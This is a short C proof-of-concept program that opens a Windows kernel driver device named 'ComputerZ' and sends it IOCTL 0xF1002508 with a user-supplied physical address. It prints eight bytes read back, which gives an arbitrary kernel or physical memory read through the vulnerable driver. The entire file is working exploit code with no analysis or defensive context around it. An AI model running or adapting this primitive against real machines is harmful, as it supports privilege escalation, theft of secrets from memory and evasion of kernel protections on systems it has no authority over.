#include <windows.h>
#include <stdio.h>

#define IoControlCode 0xF1002508

#pragma pack(push, 1)
typedef struct _POC_STRUCT {
	ULONG PhysicalAddress;
	ULONG64 NumberOfBytes;
} POC_STRUCT, * PPOC_STRUCT;
#pragma pack(pop)

int main() {
	POC_STRUCT poc;
	poc.NumberOfBytes = 8;

	ULONG StartAddress = 0;
	ULONG Output = 0;

	printf("[+] Input Target Kernel Address: 0x");
    
	scanf_s("%lx", &StartAddress);

	poc.PhysicalAddress = StartAddress;

	HANDLE hDevice = CreateFileA("\\\\.\\ComputerZ", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("CreateFileA failed with error:%lu\n", GetLastError());
		return FALSE;
	}

	DWORD bytesReturned;

	BYTE buffer[8] = { 0 };

	BOOL bRet = DeviceIoControl(
		hDevice,
		IoControlCode,
		&poc,
		sizeof(poc),
		&buffer,
		sizeof(buffer),
		&bytesReturned,
		NULL
	);
	if (!bRet) {
		printf("DeviceIoControl failed with error:%lu\n", GetLastError());
		return FALSE;
	}

	printf("bytesReturned = %lu\n", bytesReturned);
	printf("Buffer: ");
	for (DWORD i = 0; i < bytesReturned; i++)
	{
		printf("%02X ", buffer[i]);
	}
	printf("\n");

	return 0;
}